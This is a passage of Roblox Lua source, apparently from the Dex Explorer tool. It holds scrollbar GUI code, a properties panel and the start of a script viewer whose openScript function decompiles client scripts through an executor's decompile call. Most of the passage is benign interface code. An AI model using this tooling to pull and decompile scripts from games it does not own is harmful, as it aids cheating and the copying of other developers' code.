scrollStyle or scrollStyle_ds for i = 1,#children do Create(children[i],style) end end ScrollThumbFrame.Visible = down or up UpdateScrollThumb() end Class.Update = Update SetZIndexOnChanged(ScrollFrame) local scrollEventID = 0 ScrollDownFrame.MouseButton1Down:connect(function() scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollDownFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) Class:ScrollDown() wait(0.2) -- delay before auto scroll while scrollEventID == current do Class:ScrollDown() if not Class:CanScrollDown() then break end wait() end end) ScrollDownFrame.MouseButton1Up:connect(function() scrollEventID = tick() end) ScrollUpFrame.MouseButton1Down:connect(function() scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollUpFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) Class:ScrollUp() wait(0.2) while scrollEventID == current do Class:ScrollUp() if not Class:CanScrollUp() then break end wait() end end) ScrollUpFrame.MouseButton1Up:connect(function() scrollEventID = tick() end) if horizontal then ScrollBarFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollUpFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) if x > ScrollThumbFrame.AbsolutePosition.x then Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait(0.2) while scrollEventID == current do if x < ScrollThumbFrame.AbsolutePosition.x + ScrollThumbFrame.AbsoluteSize.x then break end Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait() end else Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait(0.2) while scrollEventID == current do if x > ScrollThumbFrame.AbsolutePosition.x then break end Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait() end end end) else ScrollBarFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollUpFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) if y > ScrollThumbFrame.AbsolutePosition.y then Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait(0.2) while scrollEventID == current do if y < ScrollThumbFrame.AbsolutePosition.y + ScrollThumbFrame.AbsoluteSize.y then break end Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait() end else Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait(0.2) while scrollEventID == current do if y > ScrollThumbFrame.AbsolutePosition.y then break end Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait() end end end) end if horizontal then ScrollThumbFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local mouse_offset = x - ScrollThumbFrame.AbsolutePosition.x local drag_con local up_con drag_con = MouseDrag.MouseMoved:connect(function(x,y) local bar_abs_pos = ScrollBarFrame.AbsolutePosition.x local bar_drag = ScrollBarFrame.AbsoluteSize.x - ScrollThumbFrame.AbsoluteSize.x local bar_abs_one = bar_abs_pos + bar_drag x = x - mouse_offset x = x < bar_abs_pos and bar_abs_pos or x > bar_abs_one and bar_abs_one or x x = x - bar_abs_pos Class:SetScrollPercent(x/(bar_drag)) end) up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollThumbFrame) drag_con:disconnect(); drag_con = nil up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) end) else ScrollThumbFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local mouse_offset = y - ScrollThumbFrame.AbsolutePosition.y local drag_con local up_con drag_con = MouseDrag.MouseMoved:connect(function(x,y) local bar_abs_pos = ScrollBarFrame.AbsolutePosition.y local bar_drag = ScrollBarFrame.AbsoluteSize.y - ScrollThumbFrame.AbsoluteSize.y local bar_abs_one = bar_abs_pos + bar_drag y = y - mouse_offset y = y < bar_abs_pos and bar_abs_pos or y > bar_abs_one and bar_abs_one or y y = y - bar_abs_pos Class:SetScrollPercent(y/(bar_drag)) end) up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollThumbFrame) drag_con:disconnect(); drag_con = nil up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) end) end function Class:Destroy() ScrollFrame:Destroy() MouseDrag:Destroy() for k in pairs(Class) do Class[k] = nil end setmetatable(Class,nil) end Update() return Class end end ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- local MainFrame = Instance.new("Frame") MainFrame.Name = "MainFrame" MainFrame.Size = UDim2.new(1, -1 * ScrollBarWidth, 1, 0) MainFrame.Position = UDim2.new(0, 0, 0, 0) MainFrame.BackgroundTransparency = 1 MainFrame.ClipsDescendants = true MainFrame.Parent = PropertiesFrame ContentFrame = Instance.new("Frame") ContentFrame.Name = "ContentFrame" ContentFrame.Size = UDim2.new(1, 0, 0, 0) ContentFrame.BackgroundTransparency = 1 ContentFrame.Parent = MainFrame scrollBar = ScrollBar(false) scrollBar.PageIncrement = 1 Create(scrollBar.GUI,{ Position = UDim2.new(1,-ScrollBarWidth,0,0); Size = UDim2.new(0,ScrollBarWidth,1,0); Parent = PropertiesFrame; }) scrollBarH = ScrollBar(true) scrollBarH.PageIncrement = ScrollBarWidth Create(scrollBarH.GUI,{ Position = UDim2.new(0,0,1,-ScrollBarWidth); Size = UDim2.new(1,-ScrollBarWidth,0,ScrollBarWidth); Visible = false; Parent = PropertiesFrame; }) do local listEntries = {} local nameConnLookup = {} function scrollBar.UpdateCallback(self) scrollBar.TotalSpace = ContentFrame.AbsoluteSize.Y scrollBar.VisibleSpace = MainFrame.AbsoluteSize.Y ContentFrame.Position = UDim2.new(ContentFrame.Position.X.Scale,ContentFrame.Position.X.Offset,0,-1*scrollBar.ScrollIndex) end function scrollBarH.UpdateCallback(self) end MainFrame.Changed:connect(function(p) if p == 'AbsoluteSize' then scrollBarH.VisibleSpace = math.ceil(MainFrame.AbsoluteSize.x) scrollBarH:Update() scrollBar.VisibleSpace = math.ceil(MainFrame.AbsoluteSize.y) scrollBar:Update() end end) local wheelAmount = Row.Height PropertiesFrame.MouseWheelForward:connect(function() if scrollBar.VisibleSpace - 1 > wheelAmount then scrollBar:ScrollTo(scrollBar.ScrollIndex - wheelAmount) else scrollBar:ScrollTo(scrollBar.ScrollIndex - scrollBar.VisibleSpace) end end) PropertiesFrame.MouseWheelBackward:connect(function() if scrollBar.VisibleSpace - 1 > wheelAmount then scrollBar:ScrollTo(scrollBar.ScrollIndex + wheelAmount) else scrollBar:ScrollTo(scrollBar.ScrollIndex + scrollBar.VisibleSpace) end end) end scrollBar.VisibleSpace = math.ceil(MainFrame.AbsoluteSize.y) scrollBar:Update() showProperties(GetSelection()) bindSelectionChanged.Event:connect(function() showProperties(GetSelection()) end) bindSetAwait.Event:connect(function(obj) if AwaitingObjectValue then AwaitingObjectValue = false local mySel = obj if mySel then pcall(function() Set(AwaitingObjectObj, AwaitingObjectProp, mySel) end) end end end) propertiesSearch.Changed:connect(function(prop) if prop == "Text" then showProperties(GetSelection()) end end) bindGetApi.OnInvoke = function() return RbxApi end bindGetAwait.OnInvoke = function() return AwaitingObjectValue end end) spawn(function() local top = D_E_X.ScriptEditor local editorGrid = top:WaitForChild("EditorGrid") local currentSource = "" local currentEditor = { x = 0, y = 0 } local userInput = game:GetService("UserInputService") local mouse = game:GetService("Players").LocalPlayer:GetMouse() local topBar = top:WaitForChild("TopBar") local scriptBar = topBar:WaitForChild("ScriptBar") local scriptBarLeft = topBar:WaitForChild("ScriptBarLeft") local scriptBarRight = topBar:WaitForChild("ScriptBarRight") local clipboardButton = topBar:WaitForChild("Clipboard") local entryTemplate = topBar:WaitForChild("Entry") local openEvent = top:WaitForChild("OpenScript") local closeButton = top:WaitForChild("Close") local memoryScripts = {} local editingIndex = 0 -- Scrollbar local ScrollBarWidth = 16 local ScrollStyles = { Background = Color3.new(233/255, 233/255, 233/255); Border = Color3.new(149/255, 149/255, 149/255); Selected = Color3.new( 63/255, 119/255, 189/255); BorderSelected = Color3.new( 55/255, 106/255, 167/255); Text = Color3.new( 0/255, 0/255, 0/255); TextDisabled = Color3.new(128/255, 128/255, 128/255); TextSelected = Color3.new(255/255, 255/255, 255/255); Button = Color3.new(221/255, 221/255, 221/255); ButtonBorder = Color3.new(149/255, 149/255, 149/255); ButtonSelected = Color3.new(255/255, 0/255, 0/255); Field = Color3.new(255/255, 255/255, 255/255); FieldBorder = Color3.new(191/255, 191/255, 191/255); TitleBackground = Color3.new(178/255, 178/255, 178/255); } do local ZIndexLock = {} function SetZIndex(object,z) if not ZIndexLock[object] then ZIndexLock[object] = true if object:IsA'GuiObject' then object.ZIndex = z end local children = object:GetChildren() for i = 1,#children do SetZIndex(children[i],z) end ZIndexLock[object] = nil end end end function SetZIndexOnChanged(object) return object.Changed:connect(function(p) if p == "ZIndex" then SetZIndex(object,object.ZIndex) end end) end function Create(ty,data) local obj if type(ty) == 'string' then obj = Instance.new(ty) else obj = ty end for k, v in pairs(data) do if type(k) == 'number' then v.Parent = obj else obj[k] = v end end return obj end -- returns the ascendant ScreenGui of an object function GetScreen(screen) if screen == nil then return nil end while not screen:IsA("ScreenGui") do screen = screen.Parent if screen == nil then return nil end end return screen end -- AutoButtonColor doesn't always reset properly function ResetButtonColor(button) local active = button.Active button.Active = not active button.Active = active end function ArrowGraphic(size,dir,scaled,template) local Frame = Create('Frame',{ Name = "Arrow Graphic"; BorderSizePixel = 0; Size = UDim2.new(0,size,0,size); Transparency = 1; }) if not template then template = Instance.new("Frame") template.BorderSizePixel = 0 end local transform if dir == nil or dir == 'Up' then function transform(p,s) return p,s end elseif dir == 'Down' then function transform(p,s) return UDim2.new(0,p.X.Offset,0,size-p.Y.Offset-1),s end elseif dir == 'Left' then function transform(p,s) return UDim2.new(0,p.Y.Offset,0,p.X.Offset),UDim2.new(0,s.Y.Offset,0,s.X.Offset) end elseif dir == 'Right' then function transform(p,s) return UDim2.new(0,size-p.Y.Offset-1,0,p.X.Offset),UDim2.new(0,s.Y.Offset,0,s.X.Offset) end end local scale if scaled then function scale(p,s) return UDim2.new(p.X.Offset/size,0,p.Y.Offset/size,0),UDim2.new(s.X.Offset/size,0,s.Y.Offset/size,0) end else function scale(p,s) return p,s end end local o = math.floor(size/4) if size%2 == 0 then local n = size/2-1 for i = 0,n do local t = template:Clone() local p,s = scale(transform( UDim2.new(0,n-i,0,o+i), UDim2.new(0,(i+1)*2,0,1) )) t.Position = p t.Size = s t.Parent = Frame end else local n = (size-1)/2 for i = 0,n do local t = template:Clone() local p,s = scale(transform( UDim2.new(0,n-i,0,o+i), UDim2.new(0,i*2+1,0,1) )) t.Position = p t.Size = s t.Parent = Frame end end if size%4 > 1 then local t = template:Clone() local p,s = scale(transform( UDim2.new(0,0,0,size-o-1), UDim2.new(0,size,0,1) )) t.Position = p t.Size = s t.Parent = Frame end return Frame end function GripGraphic(size,dir,spacing,scaled,template) local Frame = Create('Frame',{ Name = "Grip Graphic"; BorderSizePixel = 0; Size = UDim2.new(0,size.x,0,size.y); Transparency = 1; }) if not template then template = Instance.new("Frame") template.BorderSizePixel = 0 end spacing = spacing or 2 local scale if scaled then function scale(p) return UDim2.new(p.X.Offset/size.x,0,p.Y.Offset/size.y,0) end else function scale(p) return p end end if dir == 'Vertical' then for i=0,size.x-1,spacing do local t = template:Clone() t.Size = scale(UDim2.new(0,1,0,size.y)) t.Position = scale(UDim2.new(0,i,0,0)) t.Parent = Frame end elseif dir == nil or dir == 'Horizontal' then for i=0,size.y-1,spacing do local t = template:Clone() t.Size = scale(UDim2.new(0,size.x,0,1)) t.Position = scale(UDim2.new(0,0,0,i)) t.Parent = Frame end end return Frame end do local mt = { __index = { GetScrollPercent = function(self) return self.ScrollIndex/(self.TotalSpace-self.VisibleSpace) end; CanScrollDown = function(self) return self.ScrollIndex + self.VisibleSpace < self.TotalSpace end; CanScrollUp = function(self) return self.ScrollIndex > 0 end; ScrollDown = function(self) self.ScrollIndex = self.ScrollIndex + self.PageIncrement self:Update() end; ScrollUp = function(self) self.ScrollIndex = self.ScrollIndex - self.PageIncrement self:Update() end; ScrollTo = function(self,index) self.ScrollIndex = index self:Update() end; SetScrollPercent = function(self,percent) self.ScrollIndex = math.floor((self.TotalSpace - self.VisibleSpace)*percent + 0.5) self:Update() end; }; } mt.__index.CanScrollRight = mt.__index.CanScrollDown mt.__index.CanScrollLeft = mt.__index.CanScrollUp mt.__index.ScrollLeft = mt.__index.ScrollUp mt.__index.ScrollRight = mt.__index.ScrollDown function ScrollBar(horizontal) -- create row scroll bar local ScrollFrame = Create('Frame',{ Name = "ScrollFrame"; Position = horizontal and UDim2.new(0,0,1,-ScrollBarWidth) or UDim2.new(1,-ScrollBarWidth,0,0); Size = horizontal and UDim2.new(1,0,0,ScrollBarWidth) or UDim2.new(0,ScrollBarWidth,1,0); BackgroundTransparency = 1; Create('ImageButton',{ Name = "ScrollDown"; Position = horizontal and UDim2.new(1,-ScrollBarWidth,0,0) or UDim2.new(0,0,1,-ScrollBarWidth); Size = UDim2.new(0, ScrollBarWidth, 0, ScrollBarWidth); BackgroundColor3 = ScrollStyles.Button; BorderColor3 = ScrollStyles.Border; --BorderSizePixel = 0; }); Create('ImageButton',{ Name = "ScrollUp"; Size = UDim2.new(0, ScrollBarWidth, 0, ScrollBarWidth); BackgroundColor3 = ScrollStyles.Button; BorderColor3 = ScrollStyles.Border; --BorderSizePixel = 0; }); Create('ImageButton',{ Name = "ScrollBar"; Size = horizontal and UDim2.new(1,-ScrollBarWidth*2,1,0) or UDim2.new(1,0,1,-ScrollBarWidth*2); Position = horizontal and UDim2.new(0,ScrollBarWidth,0,0) or UDim2.new(0,0,0,ScrollBarWidth); AutoButtonColor = false; BackgroundColor3 = Color3.new(0.94902, 0.94902, 0.94902); BorderColor3 = ScrollStyles.Border; --BorderSizePixel = 0; Create('ImageButton',{ Name = "ScrollThumb"; AutoButtonColor = false; Size = UDim2.new(0, ScrollBarWidth, 0, ScrollBarWidth); BackgroundColor3 = ScrollStyles.Button; BorderColor3 = ScrollStyles.Border; --BorderSizePixel = 0; }); }); }) local graphicTemplate = Create('Frame',{ Name="Graphic"; BorderSizePixel = 0; BackgroundColor3 = ScrollStyles.Border; }) local graphicSize = ScrollBarWidth/2 local ScrollDownFrame = ScrollFrame.ScrollDown local ScrollDownGraphic = ArrowGraphic(graphicSize,horizontal and 'Right' or 'Down',true,graphicTemplate) ScrollDownGraphic.Position = UDim2.new(0.5,-graphicSize/2,0.5,-graphicSize/2) ScrollDownGraphic.Parent = ScrollDownFrame local ScrollUpFrame = ScrollFrame.ScrollUp local ScrollUpGraphic = ArrowGraphic(graphicSize,horizontal and 'Left' or 'Up',true,graphicTemplate) ScrollUpGraphic.Position = UDim2.new(0.5,-graphicSize/2,0.5,-graphicSize/2) ScrollUpGraphic.Parent = ScrollUpFrame local ScrollBarFrame = ScrollFrame.ScrollBar local ScrollThumbFrame = ScrollBarFrame.ScrollThumb do local size = ScrollBarWidth*3/8 local Decal = GripGraphic(Vector2.new(size,size),horizontal and 'Vertical' or 'Horizontal',2,graphicTemplate) Decal.Position = UDim2.new(0.5,-size/2,0.5,-size/2) Decal.Parent = ScrollThumbFrame end local MouseDrag = Create('ImageButton',{ Name = "MouseDrag"; Position = UDim2.new(-0.25,0,-0.25,0); Size = UDim2.new(1.5,0,1.5,0); Transparency = 1; AutoButtonColor = false; Active = true; ZIndex = 10; }) local Class = setmetatable({ GUI = ScrollFrame; ScrollIndex = 0; VisibleSpace = 0; TotalSpace = 0; PageIncrement = 1; },mt) local UpdateScrollThumb if horizontal then function UpdateScrollThumb() ScrollThumbFrame.Size = UDim2.new(Class.VisibleSpace/Class.TotalSpace,0,0,ScrollBarWidth) if ScrollThumbFrame.AbsoluteSize.x < ScrollBarWidth then ScrollThumbFrame.Size = UDim2.new(0,ScrollBarWidth,0,ScrollBarWidth) end local barSize = ScrollBarFrame.AbsoluteSize.x ScrollThumbFrame.Position = UDim2.new(Class:GetScrollPercent()*(barSize - ScrollThumbFrame.AbsoluteSize.x)/barSize,0,0,0) end else function UpdateScrollThumb() ScrollThumbFrame.Size = UDim2.new(0,ScrollBarWidth,Class.VisibleSpace/Class.TotalSpace,0) if ScrollThumbFrame.AbsoluteSize.y < ScrollBarWidth then ScrollThumbFrame.Size = UDim2.new(0,ScrollBarWidth,0,ScrollBarWidth) end local barSize = ScrollBarFrame.AbsoluteSize.y ScrollThumbFrame.Position = UDim2.new(0,0,Class:GetScrollPercent()*(barSize - ScrollThumbFrame.AbsoluteSize.y)/barSize,0) end end local lastDown local lastUp local scrollStyle = {BackgroundColor3=ScrollStyles.Border,BackgroundTransparency=0} local scrollStyle_ds = {BackgroundColor3=ScrollStyles.Border,BackgroundTransparency=0.7} local function Update() local t = Class.TotalSpace local v = Class.VisibleSpace local s = Class.ScrollIndex if v <= t then if s > 0 then if s + v > t then Class.ScrollIndex = t - v end else Class.ScrollIndex = 0 end else Class.ScrollIndex = 0 end if Class.UpdateCallback then if Class.UpdateCallback(Class) == false then return end end local down = Class:CanScrollDown() local up = Class:CanScrollUp() if down ~= lastDown then lastDown = down ScrollDownFrame.Active = down ScrollDownFrame.AutoButtonColor = down local children = ScrollDownGraphic:GetChildren() local style = down and scrollStyle or scrollStyle_ds for i = 1,#children do Create(children[i],style) end end if up ~= lastUp then lastUp = up ScrollUpFrame.Active = up ScrollUpFrame.AutoButtonColor = up local children = ScrollUpGraphic:GetChildren() local style = up and scrollStyle or scrollStyle_ds for i = 1,#children do Create(children[i],style) end end ScrollThumbFrame.Visible = down or up UpdateScrollThumb() end Class.Update = Update SetZIndexOnChanged(ScrollFrame) local scrollEventID = 0 ScrollDownFrame.MouseButton1Down:connect(function() scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollDownFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) Class:ScrollDown() wait(0.2) -- delay before auto scroll while scrollEventID == current do Class:ScrollDown() if not Class:CanScrollDown() then break end wait() end end) ScrollDownFrame.MouseButton1Up:connect(function() scrollEventID = tick() end) ScrollUpFrame.MouseButton1Down:connect(function() scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollUpFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) Class:ScrollUp() wait(0.2) while scrollEventID == current do Class:ScrollUp() if not Class:CanScrollUp() then break end wait() end end) ScrollUpFrame.MouseButton1Up:connect(function() scrollEventID = tick() end) if horizontal then ScrollBarFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollUpFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) if x > ScrollThumbFrame.AbsolutePosition.x then Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait(0.2) while scrollEventID == current do if x < ScrollThumbFrame.AbsolutePosition.x + ScrollThumbFrame.AbsoluteSize.x then break end Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait() end else Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait(0.2) while scrollEventID == current do if x > ScrollThumbFrame.AbsolutePosition.x then break end Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait() end end end) else ScrollBarFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollUpFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) if y > ScrollThumbFrame.AbsolutePosition.y then Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait(0.2) while scrollEventID == current do if y < ScrollThumbFrame.AbsolutePosition.y + ScrollThumbFrame.AbsoluteSize.y then break end Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait() end else Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait(0.2) while scrollEventID == current do if y > ScrollThumbFrame.AbsolutePosition.y then break end Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait() end end end) end if horizontal then ScrollThumbFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local mouse_offset = x - ScrollThumbFrame.AbsolutePosition.x local drag_con local up_con drag_con = MouseDrag.MouseMoved:connect(function(x,y) local bar_abs_pos = ScrollBarFrame.AbsolutePosition.x local bar_drag = ScrollBarFrame.AbsoluteSize.x - ScrollThumbFrame.AbsoluteSize.x local bar_abs_one = bar_abs_pos + bar_drag x = x - mouse_offset x = x < bar_abs_pos and bar_abs_pos or x > bar_abs_one and bar_abs_one or x x = x - bar_abs_pos Class:SetScrollPercent(x/(bar_drag)) end) up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollThumbFrame) drag_con:disconnect(); drag_con = nil up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) end) else ScrollThumbFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local mouse_offset = y - ScrollThumbFrame.AbsolutePosition.y local drag_con local up_con drag_con = MouseDrag.MouseMoved:connect(function(x,y) local bar_abs_pos = ScrollBarFrame.AbsolutePosition.y local bar_drag = ScrollBarFrame.AbsoluteSize.y - ScrollThumbFrame.AbsoluteSize.y local bar_abs_one = bar_abs_pos + bar_drag y = y - mouse_offset y = y < bar_abs_pos and bar_abs_pos or y > bar_abs_one and bar_abs_one or y y = y - bar_abs_pos Class:SetScrollPercent(y/(bar_drag)) end) up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollThumbFrame) drag_con:disconnect(); drag_con = nil up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) end) end function Class:Destroy() ScrollFrame:Destroy() MouseDrag:Destroy() for k in pairs(Class) do Class[k] = nil end setmetatable(Class,nil) end Update() return Class end end -- End Scrollbar local scrollBar = ScrollBar(false) scrollBar.PageIncrement = 16 Create(scrollBar.GUI,{ Position = UDim2.new(1,0,0,0); Size = UDim2.new(0,ScrollBarWidth,1,0); Parent = editorGrid; }) local scrollBarH = ScrollBar(true) scrollBarH.PageIncrement = 8 Create(scrollBarH.GUI,{ Position = UDim2.new(0,0,1,0); Size = UDim2.new(1,0,0,ScrollBarWidth); Parent = editorGrid; }) local entries = {} local grid = {} local count = 1 local xCount = 1 local lineSpan = 0 for i = 0,490,8 do local newRow = {} for j = 0,390,16 do local cellText = Instance.new("TextLabel",editorGrid) cellText.BackgroundTransparency = 1 cellText.BorderSizePixel = 0 cellText.Text = "" cellText.Position = UDim2.new(0,i,0,j) cellText.Size = UDim2.new(0,8,0,16) cellText.Font = Enum.Font.SourceSans cellText.FontSize = Enum.FontSize.Size18 table.insert(newRow,cellText) xCount = xCount + 1 end table.insert(grid,newRow) count = count + 1 xCount = 1 end local syntaxHighlightList = { {["Keyword"] = "for", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "local", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "if", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "then", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "do", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "while", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "end", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "function", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "string", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "table", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "game", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "workspace", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "return", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "break", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "elseif", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "in", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "pairs", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "ipairs", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true} } function checkMouseInGui(gui) if gui == nil then return false end local plrMouse = game:GetService("Players").LocalPlayer:GetMouse() local guiPosition = gui.AbsolutePosition local guiSize = gui.AbsoluteSize if plrMouse.X >= guiPosition.x and plrMouse.X <= guiPosition.x + guiSize.x and plrMouse.Y >= guiPosition.y and plrMouse.Y <= guiPosition.y + guiSize.y then return true else return false end end function AddZeros(num,reach) local toConvert = tostring(num) while #toConvert < reach do toConvert = " "..toConvert end return toConvert end function buildScript(source,xOff,yOff,override) local buildingRows = true local buildScr = source local totalLines = 0 --print(xOff,yOff) if currentSource ~= source then currentSource = source end if override then currentSource = source entries = {} while buildingRows do local x,y = string.find(buildScr,"\n") if x and y then table.insert(entries,string.sub(buildScr,1,y)) buildScr = string.sub(buildScr,y+1,string.len(buildScr)) else buildingRows = false table.insert(entries,buildScr) end end end totalLines = #entries lineSpan = #tostring(totalLines) if lineSpan == 1 then lineSpan = 2 end local currentRow = 1 local currentColumn = 2 + lineSpan local colorTime = 0 local colorReplace = nil local inString = false local workingEntries = entries --[[ for i,v in pairs(entries) do table.insert(workingEntries,v) end for i = 1,yOff do table.remove(workingEntries,1) end --]] local delayance = xOff for i = 1,#grid do for j = 1,#grid[i] do if i <= lineSpan then local newNum = AddZeros(yOff + j,lineSpan) local newDigit = string.sub(newNum,i,i) if newDigit == " " then grid[i][j].Text = "" else grid[i][j].Text = newDigit end grid[i][j].BackgroundTransparency = 0 grid[i][j].BackgroundColor3 = Color3.new(163/255, 162/255, 165/255) --grid[i][j].Font = Enum.Font.SourceSansBold elseif i == lineSpan + 1 then grid[i][j].Text = "" grid[i][j].BackgroundTransparency = 0 grid[i][j].BackgroundColor3 = Color3.new(200/255, 200/255, 200/255) --grid[i][j].Font = Enum.Font.SourceSans else grid[i][j].Text = "" grid[i][j].BackgroundTransparency = 1 --grid[i][j].Font = Enum.Font.SourceSans end end end while true do if currentRow > #workingEntries or currentRow > #grid[1] then break end local entry = workingEntries[currentRow+yOff] while string.len(entry) > 0 do if string.sub(entry,1,1) == "\t" then entry = " "..string.sub(entry,2) end if currentColumn > #grid then break end if delayance == 0 then grid[currentColumn][currentRow].Text = string.sub(entry,1,1) end -- Coloring if not inString then for i,v in pairs(syntaxHighlightList) do if string.sub(entry,1,string.len(v["Keyword"])) == v["Keyword"] then if v["Independent"] then local outCheck = string.len(v["Keyword"])+1 local outEntry = string.sub(entry,outCheck,outCheck) if not string.find(outEntry,"%w") then colorTime = string.len(v["Keyword"]) colorReplace = v["Color"] end else colorTime = string.len(v["Keyword"]) colorReplace = v["Color"] end end end end if string.sub(entry,1,1) == "\"" and string.match(entry,"\".+\"") then inString = true colorTime = string.len(string.match(entry,"\".+\"")) colorReplace = Color3.new(170/255, 0, 1) end if colorTime > 0 then colorTime = colorTime - 1 grid[currentColumn][currentRow].TextColor3 = colorReplace if colorTime == 0 then inString = false end else grid[currentColumn][currentRow].TextColor3 = Color3.new(0,0,0) inString = false end if delayance == 0 then currentColumn = currentColumn + 1 else delayance = delayance - 1 end entry = string.sub(entry,2,string.len(entry)) end currentRow = currentRow + 1 currentColumn = 2 + lineSpan colorTime = 0 delayance = xOff inString = false end end function scrollBar.UpdateCallback(self) scrollBar.TotalSpace = #entries * 16 scrollBar.VisibleSpace = editorGrid.AbsoluteSize.Y buildScript(currentSource,math.floor(scrollBarH.ScrollIndex/8),math.floor(scrollBar.ScrollIndex/16)) end function scrollBarH.UpdateCallback(self) scrollBarH.TotalSpace = (getLongestEntry(entries) + 1 + lineSpan) * 8 scrollBarH.VisibleSpace = editorGrid.AbsoluteSize.X buildScript(currentSource,math.floor(scrollBarH.ScrollIndex/8),math.floor(scrollBar.ScrollIndex/16)) end function getLongestEntry(tab) local longest = 0 for i,v in pairs(tab) do if string.len(v) > longest then longest = string.len(v) end end return longest end function openScript(scrObj) if scrObj:IsA("LocalScript") then scrObj.Archivable = true scrObj = scrObj:Clone() scrObj.Disabled = true end local scrName = scrObj.Name local scrSource = decompile(scrObj) table.insert(memoryScripts,{Name = scrName,Source = scrSource}) local newTab = entryTemplate:Clone() newTab.Button.Text = scrName newTab.Position = UDim2.new(0,#scriptBar:GetChildren() * 100,0,0) newTab.Visible = true newTab.Button.MouseButton1Down:connect(function() for i,v in pairs(scriptBar:GetChildren()) 